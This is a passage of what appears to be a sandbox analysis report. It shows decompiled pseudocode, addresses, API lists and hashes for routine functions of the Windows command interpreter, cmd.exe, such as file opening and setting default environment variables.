							 *(_t147 + 0x38) = _t71;
							__eflags = _t71;
							if(_t71 == 0) {
								goto L74;
							}
							_t72 = E011DDF40( *((intOrPtr*)(_v556 + 0x38)));
							 *(_t147 + 0x3c) = _t72;
							__eflags = _t72;
							if(_t72 == 0) {
								goto L74;
							}
							_t136 = 1;
							_t72->i = 0x20;
							 *(_t147 + 0x40) = 0;
							_v552 = 1;
							L14:
							if(_t143 != 0) {
								__eflags = _t147;
								if(_t147 != 0) {
									_v560 = 0;
								}
							}
							_t124 = _t147->i;
							if(_t124 != 0 ||  *( *(_t147 + 0x38)) != 0x3a) {
								if(_t136 != 0) {
									_v552 = 0;
									_t74 = _t124;
								} else {
									_t74 = _t124;
									if( *0x11fd0c8 == 1) {
										_t74 = _t124;
										__eflags = _t124 - 0x3b;
										if(_t124 != 0x3b) {
											__eflags =  *0x1218530;
											_t74 = _t124;
											if( *0x1218530 == 0) {
												E011F6FF0(_t124);
												_t136 = 0;
												E011F2ED0(_t147, 0);
												E011E25D9(L"\r\n");
												_t74 = _t147->i;
												_t152 = _t152 + 4;
											}
										}
									}
								}
								if(_t74 == 0x3b) {
									_t147 =  *(_t147 + 0x38);
								}
								_v28 = 0;
								_v24 = 1;
								 *(_t152 + 0x23c) = 0x104;
								memset(_t152 + 0x24, 0, 0x104);
								_t152 = _t152 + 0xc;
								if(_v24 == 0) {
									_t77 = 0x104;
								} else {
									_t77 = 0x7fe7;
								}
								if(E011E0C70(_t152 + 0x24, _t77) < 0) {
									E011E0DE8(_t78, _t152 + 0x20);
									goto L74;
								} else {
									if(_t147 == 0) {
										_t147 = 0;
										_v564 = 0;
										L29:
										__imp__??_V@YAXPAX@Z(_v28);
										_t152 = _t152 + 4;
										goto L30;
									}
									if( *_t147 != 0 || E011DDFC0(0x2a,  *(_t147 + 0x38),  &_v564) != 0xffffffff) {
										L26:
										_t136 = _t147;
										_v564 = E011E0E00(2, _t147);
										E011E06C0(2);
										_t82 = GetConsoleOutputCP();
										 *0x1203854 = _t82;
										GetCPInfo(_t82, 0x1203840);
										_t149 =  *0x11fd5f8; // 0x0
										if(_t149 == 0) {
											_t84 =  *0x11fd0d0; // 0xffffffff
											__eflags = _t84 - 0xffffffff;
											if(_t84 != 0xffffffff) {
												L68:
												__eflags = _t84;
												if(_t84 != 0) {
													_t149 = GetProcAddress(_t84, "SetThreadUILanguage");
													 *0x11fd5f8 = _t149;
												}
												L70:
												__eflags = _t149;
												if(_t149 != 0) {
													goto L27;
												}
												SetThreadLocale(0x409);
												L28:
												_t147 = _v568;
												goto L29;
											}
											_t84 = GetModuleHandleW(L"KERNEL32.DLL");
											_t149 =  *0x11fd5f8; // 0x0
											 *0x11fd0d0 = _t84;
											__eflags = _t84 - 0xffffffff;
											if(_t84 == 0xffffffff) {
												goto L70;
											}
											goto L68;
										}
										L27:
										 *0x12194b4(0);
										_t149->i();
										goto L28;
									} else {
										_t91 = E011DD7D4( *(_t147 + 0x38), 0x2a);
										__eflags = _t91;
										if(_t91 != 0) {
											goto L26;
										}
										_t44 = _t91 + 0x3f; // 0x3f
										_t92 = E011DD7D4( *(_t147 + 0x38), _t44);
										__eflags = _t92;
										if(_t92 != 0) {
											goto L26;
										}
										_t141 = _v28;
										__eflags = _v28;
										if(__eflags == 0) {
											_t141 = _t152 + 0x20;
										}
										_t93 = E011E10B0(_t147, _t141, __eflags,  *((intOrPtr*)(_t152 + 0x230)));
										__eflags = _t93 - 2;
										if(_t93 != 2) {
											goto L26;
										} else {
											__eflags =  *(_t147 + 0x34);
											if( *(_t147 + 0x34) == 0) {
												L62:
												_t94 = _v28;
												__eflags = _t94;
												if(__eflags == 0) {
													_t94 = _t152 + 0x20;
												}
												_t136 =  *_t111;
												_push(_t94);
												_push(_t111[1]);
												_t95 = E011E1F52(_t111, _t147,  *_t111, _t143, _t147, __eflags);
												__eflags = _t95;
												if(_t95 != 0) {
													goto L72;
												} else {
													_t147 = 0;
													_v568 = 1;
													_v572 = 0;
													goto L29;
												}
											} else {
												_t136 = _t147;
												_t96 = E011F76C0(_v556, _t147);
												__eflags = _t96;
												if(_t96 != 0) {
													L72:
													__imp__??_V@YAXPAX@Z(_v36);
													_t152 = _t152 + 4;
													_t63 = 1;
													goto L33;
												}
												goto L62;
											}
										}
									}
								}
							} else {
								L42:
								_t147 = _v564;
								L30:
								if( *0x1213cc4 != _t111) {
									goto L79;
								}
								_t143 = _v560;
								_t136 = _v556;
								continue;
							}
						}
					}
				}
			}




















































                                    0x011de560
                                    0x011de568
                                    0x011de56e
                                    0x011de575
                                    0x011de57f
                                    0x011de581
                                    0x011de585
                                    0x011de589
                                    0x011de58e
                                    0x011de592
                                    0x011de596
                                    0x011de5a0
                                    0x011ec011
                                    0x011ec011
                                    0x00000000
                                    0x011de5a6
                                    0x00000000
                                    0x011de5b0
                                    0x011de5b7
                                    0x011ebe97
                                    0x011ebe9c
                                    0x011ebe9c
                                    0x011de5c4
                                    0x011de5cb
                                    0x011de5d5
                                    0x011de5dc
                                    0x011de5e1
                                    0x00000000
                                    0x00000000
                                    0x011de5f1
                                    0x011de5f7
                                    0x011de5f9
                                    0x011de5ff
                                    0x011de602
                                    0x011de605
                                    0x011de608
                                    0x011de60a
                                    0x011de60f
                                    0x011de62b
                                    0x011de62c
                                    0x011de632
                                    0x011de637
                                    0x00000000
                                    0x00000000
                                    0x011de640
                                    0x011ebfcf
                                    0x011ebfd4
                                    0x011ebfdb
                                    0x011ebfdd
                                    0x011ebfe4
                                    0x011ebfe6
                                    0x011ebff7
                                    0x011ebffc
                                    0x011ebffc
                                    0x011ebfe4
                                    0x011ebfff
                                    0x011ec00b
                                    0x00000000
                                    0x011de656
                                    0x011de659
                                    0x011de794
                                    0x00000000
                                    0x011de65f
                                    0x011de65f
                                    0x011de663
                                    0x00000000
                                    0x011de663
                                    0x011de659
                                    0x011de640
                                    0x011de614
                                    0x011ebea5
                                    0x011ebeab
                                    0x011ebeab
                                    0x011ebeac
                                    0x011ebeae
                                    0x011ebeae
                                    0x011ebeb1
                                    0x011ebeb1
                                    0x011ebeb1
                                    0x011ebeb6
                                    0x011de621
                                    0x00000000
                                    0x011de7ad
                                    0x011de7b0
                                    0x011de7b4
                                    0x00000000
                                    0x00000000
                                    0x011de7c4
                                    0x011de7c6
                                    0x011de7c8
                                    0x011ebfc5
                                    0x011ebfc5
                                    0x011de798
                                    0x011de79f
                                    0x011de7a0
                                    0x011de7a1
                                    0x011de7a2
                                    0x011de7ac
                                    0x011de7ac
                                    0x011de7d3
                                    0x011de7d9
                                    0x011de7de
                                    0x011de7e1
                                    0x011de7e3
                                    0x00000000
                                    0x00000000
                                    0x011de7f0
                                    0x011de7f5
                                    0x011de7f8
                                    0x011de7fa
                                    0x00000000
                                    0x00000000
                                    0x011de805
                                    0x011de80a
                                    0x011de80d
                                    0x011de814
                                    0x011de667
                                    0x011de669
                                    0x011de81d
                                    0x011de81f
                                    0x011de827
                                    0x011de827
                                    0x011de81f
                                    0x011de66f
                                    0x011de673
                                    0x011de684
                                    0x011de832
                                    0x011de836
                                    0x011de68a
                                    0x011de691
                                    0x011de693
                                    0x011de89d
                                    0x011de89f
                                    0x011de8a2
                                    0x011ebebb
                                    0x011ebec2
                                    0x011ebec4
                                    0x011ebeca
                                    0x011ebecf
                                    0x011ebed3
                                    0x011ebedd
                                    0x011ebee2
                                    0x011ebee4
                                    0x011ebee4
                                    0x011ebec4
                                    0x011de8a2
                                    0x011de693
                                    0x011de69c
                                    0x011de846
                                    0x011de846
                                    0x011de6ab
                                    0x011de6b9
                                    0x011de6c1
                                    0x011de6cc
                                    0x011de6d1
                                    0x011de6dc
                                    0x011ebeec
                                    0x011de6e2
                                    0x011de6e2
                                    0x011de6e2
                                    0x011de6f3
                                    0x011ebfc0
                                    0x00000000
                                    0x011de6f9
                                    0x011de6fb
                                    0x011ebef6
                                    0x011ebef8
                                    0x011de76b
                                    0x011de772
                                    0x011de778
                                    0x00000000
                                    0x011de778
                                    0x011de704
                                    0x011de721
                                    0x011de721
                                    0x011de72d
                                    0x011de731
                                    0x011de736
                                    0x011de742
                                    0x011de747
                                    0x011de74d
                                    0x011de755
                                    0x011ebf4d
                                    0x011ebf52
                                    0x011ebf55
                                    0x011ebf72
                                    0x011ebf72
                                    0x011ebf74
                                    0x011ebf82
                                    0x011ebf84
                                    0x011ebf84
                                    0x011ebf8a
                                    0x011ebf8a
                                    0x011ebf8c
                                    0x00000000
                                    0x00000000
                                    0x011ebf97
                                    0x011de767
                                    0x011de767
                                    0x00000000
                                    0x011de767
                                    0x011ebf5c
                                    0x011ebf62
                                    0x011ebf68
                                    0x011ebf6d
                                    0x011ebf70
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ebf70
                                    0x011de75b
                                    0x011de75f
                                    0x011de765
                                    0x00000000
                                    0x011de84e
                                    0x011de856
                                    0x011de85b
                                    0x011de85d
                                    0x00000000
                                    0x00000000
                                    0x011de866
                                    0x011de869
                                    0x011de86e
                                    0x011de870
                                    0x00000000
                                    0x00000000
                                    0x011de876
                                    0x011de87d
                                    0x011de87f
                                    0x011de8ad
                                    0x011de8ad
                                    0x011de88a
                                    0x011de88f
                                    0x011de892
                                    0x00000000
                                    0x011de898
                                    0x011ebf01
                                    0x011ebf05
                                    0x011ebf1a
                                    0x011ebf1a
                                    0x011ebf21
                                    0x011ebf23
                                    0x011ebf25
                                    0x011ebf25
                                    0x011ebf29
                                    0x011ebf2d
                                    0x011ebf2e
                                    0x011ebf31
                                    0x011ebf36
                                    0x011ebf38
                                    0x00000000
                                    0x011ebf3a
                                    0x011ebf3a
                                    0x011ebf3c
                                    0x011ebf44
                                    0x00000000
                                    0x011ebf44
                                    0x011ebf07
                                    0x011ebf0b
                                    0x011ebf0d
                                    0x011ebf12
                                    0x011ebf14
                                    0x011ebfa2
                                    0x011ebfa9
                                    0x011ebfaf
                                    0x011ebfb2
                                    0x00000000
                                    0x011ebfb2
                                    0x00000000
                                    0x011ebf14
                                    0x011ebf05
                                    0x011de892
                                    0x011de704
                                    0x011de83d
                                    0x011de83d
                                    0x011de83d
                                    0x011de77b
                                    0x011de781
                                    0x00000000
                                    0x00000000
                                    0x011de787
                                    0x011de78b
                                    0x00000000
                                    0x011de78b
                                    0x011de673
                                    0x011de5cb
                                    0x011de5b0

                                    APIs
                                    • _tell.MSVCRT ref: 011DE5F9
                                    • _close.MSVCRT ref: 011DE62C
                                    • memset.MSVCRT ref: 011DE6CC
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 011DE736
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011DE747
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DE772
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ConsoleInfoOutput_close_tellmemset
                                    • String ID: GOTO$KERNEL32.DLL$SetThreadUILanguage
                                    • API String ID: 1380661413-3584302480
                                    • Opcode ID: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction ID: 6dc516c65a3c5d278609d9408169d379666fc48460fcd179a318d4dcd9cfbe24
                                    • Opcode Fuzzy Hash: bb479d3c5bf83f5ad12288b8a65ce6467749bebcc067ad474f9779c70f92ee1d
                                    • Instruction Fuzzy Hash: 53B1F4306097118BDB3DDFA8E45872A7BE1BF84719F05052DE9468B294EB71D885CF83
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DD120, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 177fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 21%
                                    			E011DD120(long __ecx, signed int __edx) {
				void _v8;
				long _v12;
				long _v16;
				long _v20;
				signed int _v24;
				long _v28;
				struct _SECURITY_ATTRIBUTES _v40;
				signed int _t34;
				long _t37;
				void* _t41;
				signed int _t44;
				signed int _t49;
				int _t54;
				signed char _t64;
				void* _t67;
				signed int _t71;
				long _t75;
				void* _t76;
				signed int _t78;
				signed int _t79;
				void* _t81;

				_t65 = __ecx;
				_t75 = 3;
				_v20 = __ecx;
				_t64 = __edx;
				_v16 = 3;
				_t71 = __edx & 0x00000003;
				_v40.bInheritHandle = 1;
				_v40.lpSecurityDescriptor = 0;
				_v40.nLength = 0xc;
				if(_t71 > 2) {
					L2:
					return _t34 | 0xffffffff;
				}
				_t34 = __edx & 0x00000009;
				if(_t34 != 9) {
					if(_t71 != 0) {
						_t78 = 0x40000000;
						__imp___wcsicmp(__ecx, L"con");
						_t81 = _t81 + 8;
						if(_t34 != 0) {
							_t75 = 1;
							_v16 = 1;
						}
						_t65 = _v20;
						_t37 = 2;
					} else {
						_t78 = 0x80000000;
						_t37 = 3;
					}
					_push(0);
					_push(0x80);
					if(_t64 == 0x10a) {
						_t41 = CreateFileW(_t65, _t78 | 0x80000000, _t75,  &_v40, 3, ??, ??);
						_t76 = _t41;
						if(_t76 != 0xffffffff) {
							goto L9;
						}
						_push(0);
						_push(0x80);
						_push(4);
						_push( &_v40);
						_push(_v16);
						_push(_t78);
						_push(_v20);
						goto L8;
					} else {
						_push(_t37);
						_push( &_v40);
						_push(_t75);
						_push(_t78);
						_push(_t65);
						L8:
						_t41 = CreateFileW();
						_t76 = _t41;
						if(_t76 == 0xffffffff) {
							_t54 = GetLastError();
							 *0x1213cf0 = _t54;
							if(_t54 == 0x6e) {
								 *0x1213cf0 = 2;
							}
							L28:
							_t44 = _t54 | 0xffffffff;
							L14:
							return _t44;
						}
						L9:
						__imp___open_osfhandle(_t76, 8);
						_t79 = _t41;
						if((_t64 & 0x00000008) != 0) {
							if(E011E0178(_t41) != 0) {
								goto L10;
							}
							_t49 = GetFileSize(_t76,  &_v20);
							_v24 = _t49;
							if((_t49 | _v20) == 0) {
								goto L10;
							}
							_v12 = 0xffffffff;
							_v8 = 0;
							if(SetFilePointer(_t76, 0xffffffff,  &_v12, 2) == 0xffffffff) {
								_t54 = GetLastError();
								 *0x1213cf0 = _t54;
								if(_t54 == 0) {
									goto L23;
								}
								if(_t79 == 0xffffffff) {
									_t54 = CloseHandle(_t76);
								} else {
									__imp___close(_t79);
								}
								goto L28;
							}
							L23:
							if(ReadFile(_t76,  &_v8, 1,  &_v28, 0) == 0) {
								_v12 = 0;
								SetFilePointer(_t76, 0,  &_v12, 2);
							}
							if(_v8 == 0x1a) {
								_v12 = 0xffffffff;
								SetFilePointer(_t76, 0xffffffff,  &_v12, 2);
							}
						}
						L10:
						_t9 = _t79 - 3; // -3
						_t67 = 0;
						if(_t9 <= 0x5b) {
							if(_t79 > 0x1f) {
								_t33 = _t79 - 0x20; // -32
								_t67 = (_t33 >> 5) + 1;
							}
							asm("bts eax, edx");
						}
						_t44 = _t79;
						goto L14;
					}
				}
				goto L2;
			}
























                                    0x011dd120
                                    0x011dd12a
                                    0x011dd12f
                                    0x011dd132
                                    0x011dd134
                                    0x011dd137
                                    0x011dd139
                                    0x011dd140
                                    0x011dd147
                                    0x011dd151
                                    0x011dd15c
                                    0x00000000
                                    0x011dd15c
                                    0x011dd155
                                    0x011dd15a
                                    0x011dd16a
                                    0x011dd1ea
                                    0x011dd1ef
                                    0x011dd1f5
                                    0x011dd1fa
                                    0x011dd1fc
                                    0x011dd201
                                    0x011dd201
                                    0x011dd204
                                    0x011dd207
                                    0x011dd16c
                                    0x011dd16c
                                    0x011dd171
                                    0x011dd171
                                    0x011dd173
                                    0x011dd175
                                    0x011dd180
                                    0x011dd221
                                    0x011dd227
                                    0x011dd22c
                                    0x00000000
                                    0x00000000
                                    0x011dd232
                                    0x011dd234
                                    0x011dd239
                                    0x011dd23e
                                    0x011dd23f
                                    0x011dd242
                                    0x011dd243
                                    0x00000000
                                    0x011dd186
                                    0x011dd186
                                    0x011dd18a
                                    0x011dd18b
                                    0x011dd18c
                                    0x011dd18d
                                    0x011dd18e
                                    0x011dd18e
                                    0x011dd194
                                    0x011dd199
                                    0x011eb555
                                    0x011eb55b
                                    0x011eb563
                                    0x011eb565
                                    0x011eb565
                                    0x011eb56f
                                    0x011eb56f
                                    0x011dd1de
                                    0x00000000
                                    0x011dd1de
                                    0x011dd19f
                                    0x011dd1a2
                                    0x011dd1ab
                                    0x011dd1b0
                                    0x011dd254
                                    0x00000000
                                    0x00000000
                                    0x011dd25f
                                    0x011dd265
                                    0x011dd26b
                                    0x00000000
                                    0x00000000
                                    0x011dd273
                                    0x011dd27c
                                    0x011dd290
                                    0x011eb577
                                    0x011eb57d
                                    0x011eb584
                                    0x00000000
                                    0x00000000
                                    0x011eb58d
                                    0x011eb59c
                                    0x011eb58f
                                    0x011eb590
                                    0x011eb596
                                    0x00000000
                                    0x011eb58d
                                    0x011dd296
                                    0x011dd2ab
                                    0x011eb5a9
                                    0x011eb5b4
                                    0x011eb5b4
                                    0x011dd2b6
                                    0x011eb5c4
                                    0x011eb5cf
                                    0x011eb5cf
                                    0x011dd2b6
                                    0x011dd1b6
                                    0x011dd1b6
                                    0x011dd1b9
                                    0x011dd1c0
                                    0x011dd1c5
                                    0x011eb5da
                                    0x011eb5e2
                                    0x011eb5e8
                                    0x011dd1d2
                                    0x011dd1d5
                                    0x011dd1dc
                                    0x00000000
                                    0x011dd1dc
                                    0x011dd180
                                    0x00000000

                                    APIs
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,?,0000000C,00000004,00000080,00000000), ref: 011DD18E
                                    • _open_osfhandle.MSVCRT ref: 011DD1A2
                                    • _wcsicmp.MSVCRT ref: 011DD1EF
                                    • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,011FF830,00002000), ref: 011DD221
                                    • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 011DD25F
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011DD287
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 011DD2A3
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,FFFFFFFF,00000002), ref: 011EB5B4
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 011EB5CF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$Pointer$Create$ReadSize_open_osfhandle_wcsicmp
                                    • String ID: con
                                    • API String ID: 686027947-4257191772
                                    • Opcode ID: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction ID: 66505b56df8f293d09b86d5a0b2db156b08ff371d17eb2aad300261ee6bbb50f
                                    • Opcode Fuzzy Hash: 64c3505c91936b72e4b3a4c85733a80c722dd3887d70ba059809142a7a20a573
                                    • Instruction Fuzzy Hash: AC51F870A00214ABEF28CBE8FC4DBBE7AF9EF45724F110219F925E22C4DB7199458751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DCEA9, Relevance: 24.7, APIs: 6, Strings: 8, Instructions: 167COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E011DCEA9() {
				signed int _v8;
				long _v12;
				char _v16;
				int _v20;
				void _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t30;
				WCHAR* _t41;
				struct HINSTANCE__* _t50;
				struct HINSTANCE__* _t52;
				void* _t53;
				int _t55;
				void* _t56;
				struct HINSTANCE__* _t78;
				signed int _t79;
				struct HINSTANCE__* _t81;
				void* _t85;
				int* _t88;
				void* _t89;
				struct HINSTANCE__* _t91;
				struct HINSTANCE__* _t96;
				signed int _t98;

				_t30 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t30 ^ _t98;
				_t91 = 0;
				_v12 = 0x104;
				_v20 = 0;
				_v16 = 1;
				memset( &_v540, 0, 0x104);
				if(E011E0C70( &_v540, ((0 | _v16 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
					do {
						__eflags = E011E4B60(__eflags, 0);
					} while (__eflags == 0);
					exit(1);
					L13:
					_t41 =  &_v540;
					L2:
					GetModuleFileNameW(_t91, _t41, _v12);
					if(E011DCFBC(L"PATH") == 0) {
						E011E3A50(L"PATH", 0x11d24ac);
					}
					if(E011DCFBC(L"PATHEXT") == 0) {
						E011E3A50(L"PATHEXT", L".COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC");
					}
					_t95 = L"PROMPT";
					if(E011DCFBC(L"PROMPT") == 0) {
						E011E3A50(L"PROMPT", L"$P$G");
					}
					if(E011DCFBC(L"COMSPEC") == 0) {
						_t68 = _v20;
						__eflags = _v20;
						if(_v20 == 0) {
							_t68 =  &_v540;
						}
						_t85 = 0x2e;
						_t50 = E011DD7D4(_t68, _t85);
						__eflags = _t50;
						if(_t50 != 0) {
							L33:
							_t86 = _v20;
							__eflags = _v20;
							if(_v20 == 0) {
								_t86 =  &_v540;
							}
							E011E3A50(L"COMSPEC", _t86);
							goto L6;
						} else {
							__imp___wcsupr(L"CMD.EXE");
							_t78 = _v20;
							_t96 = _t78;
							__eflags = _t78;
							if(_t78 == 0) {
								_t96 =  &_v540;
							}
							_t88 =  &(_t96->i);
							do {
								_t55 = _t96->i;
								_t96 =  &(_t96->i);
								__eflags = _t55 - _t91;
							} while (_t55 != _t91);
							_t91 = _t78;
							_t95 = _t96 - _t88 >> 1;
							__eflags = _t78;
							if(_t78 == 0) {
								_t91 =  &_v540;
								_t78 = _t91;
							}
							_t89 = 0x5c;
							_t56 = E011E2349(_t78, _t89);
							_t79 = _t95 - 1;
							__eflags = _t91 + _t79 * 2 - _t56;
							_t81 = _v20;
							if(_t91 + _t79 * 2 == _t56) {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"CMD.EXE");
							} else {
								__eflags = _t81;
								if(_t81 == 0) {
									_t81 =  &_v540;
								}
								_push(L"\\CMD.EXE");
							}
							E011E18C0(_t81, _v12);
							goto L33;
						}
					} else {
						L6:
						_t52 = E011DCFBC(L"KEYS");
						if(_t52 != 0) {
							__imp___wcsicmp(_t52, L"ON");
							__eflags = _t52;
							if(__eflags == 0) {
								 *0x121852c = 1;
							}
						}
						_t73 =  *0x1213cb8;
						_t109 =  *0x1213cb8;
						if( *0x1213cb8 == 0) {
							_t73 = 0x1213ab0;
						}
						_t53 = E011E33FC(1, _t73, 1, _t91, _t95, _t109);
						__imp__??_V@YAXPAX@Z();
						return E011E6FD0(_t53, 1, _v8 ^ _t98, 1, _t91, _t95, _v20);
					}
				}
				_t41 = _v20;
				if(_t41 == 0) {
					goto L13;
				}
				goto L2;
			}




























                                    0x011dceb4
                                    0x011dcebb
                                    0x011dcecc
                                    0x011dcece
                                    0x011dced4
                                    0x011dceda
                                    0x011dcedd
                                    0x011dcf03
                                    0x011eb419
                                    0x011eb41f
                                    0x011eb41f
                                    0x011eb424
                                    0x011eb42a
                                    0x011eb42a
                                    0x011dcf14
                                    0x011dcf19
                                    0x011dcf2d
                                    0x011eb43c
                                    0x011eb43c
                                    0x011dcf41
                                    0x011eb44d
                                    0x011eb44d
                                    0x011dcf47
                                    0x011dcf55
                                    0x011dcfae
                                    0x011dcfae
                                    0x011dcf63
                                    0x011eb457
                                    0x011eb45a
                                    0x011eb45c
                                    0x011eb45e
                                    0x011eb45e
                                    0x011eb466
                                    0x011eb467
                                    0x011eb46c
                                    0x011eb46e
                                    0x011eb4e8
                                    0x011eb4e8
                                    0x011eb4eb
                                    0x011eb4ed
                                    0x011eb4ef
                                    0x011eb4ef
                                    0x011eb4fa
                                    0x00000000
                                    0x011eb470
                                    0x011eb475
                                    0x011eb47c
                                    0x011eb47f
                                    0x011eb481
                                    0x011eb483
                                    0x011eb485
                                    0x011eb485
                                    0x011eb48b
                                    0x011eb48e
                                    0x011eb48e
                                    0x011eb491
                                    0x011eb494
                                    0x011eb494
                                    0x011eb49b
                                    0x011eb49d
                                    0x011eb49f
                                    0x011eb4a1
                                    0x011eb4a3
                                    0x011eb4a9
                                    0x011eb4a9
                                    0x011eb4ad
                                    0x011eb4ae
                                    0x011eb4b3
                                    0x011eb4b9
                                    0x011eb4bb
                                    0x011eb4be
                                    0x011eb4d1
                                    0x011eb4d3
                                    0x011eb4d5
                                    0x011eb4d5
                                    0x011eb4db
                                    0x011eb4c0
                                    0x011eb4c0
                                    0x011eb4c2
                                    0x011eb4c4
                                    0x011eb4c4
                                    0x011eb4ca
                                    0x011eb4ca
                                    0x011eb4e3
                                    0x00000000
                                    0x011eb4e3
                                    0x011dcf69
                                    0x011dcf69
                                    0x011dcf6e
                                    0x011dcf75
                                    0x011eb50a
                                    0x011eb512
                                    0x011eb514
                                    0x011eb51a
                                    0x011eb51a
                                    0x011eb514
                                    0x011dcf7b
                                    0x011dcf81
                                    0x011dcf83
                                    0x011dcfb5
                                    0x011dcfb5
                                    0x011dcf87
                                    0x011dcf8f
                                    0x011dcfa6
                                    0x011dcfa6
                                    0x011dcf63
                                    0x011dcf09
                                    0x011dcf0e
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    • memset.MSVCRT ref: 011DCEDD
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001), ref: 011DCF19
                                      • Part of subcall function 011DCFBC: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,011FF830,00002000,?,?,?,?,?,011E373A,011D590A,00000000), ref: 011DCFDF
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD005
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD01B
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD031
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD047
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD05D
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD073
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD085
                                      • Part of subcall function 011DCFBC: _wcsicmp.MSVCRT ref: 011DD09B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DCF8F
                                    • exit.MSVCRT ref: 011EB424
                                    • _wcsupr.MSVCRT ref: 011EB475
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                    • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                    • API String ID: 2336066422-4197029667
                                    • Opcode ID: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction ID: b3eeafd94dc2fe9e9e3be91e5d79259d8d0dbc66d93d7a167d8106944e83d4a4
                                    • Opcode Fuzzy Hash: 6ab7b19cae45f4baaf6f83616a21bb29c37f8a13c9227a95be69f45e64075f1c
                                    • Instruction Fuzzy Hash: 6651E531B0461A97DF2CDBA5985C6FFB7A5EFA0108B04449DE817A3184DF349D45CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E33FC, Relevance: 24.3, APIs: 16, Instructions: 307COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 87%
                                    			E011E33FC(short __ebx, WCHAR* __ecx, WCHAR* __edx, WCHAR* __edi, void* __esi, void* __eflags) {
				void* _t75;
				short _t86;
				WCHAR* _t87;
				WCHAR* _t88;
				signed short* _t90;
				short _t93;
				int _t94;
				WCHAR* _t96;
				WCHAR* _t105;
				short _t109;
				WCHAR* _t113;
				WCHAR* _t115;
				WCHAR* _t125;
				signed int _t126;
				void* _t131;
				WCHAR* _t142;
				WCHAR* _t145;
				WCHAR* _t153;
				short* _t164;
				WCHAR* _t166;
				signed int _t168;
				WCHAR* _t169;
				short* _t176;
				void* _t177;

				_t173 = __edi;
				_t135 = __ebx;
				_push(0x240);
				_push(0x11fbdd8);
				E011E75CC(__ebx, __edi, __esi);
				 *(_t177 - 0x24c) = __edx;
				_t175 = __ecx;
				_t75 = 0x5c;
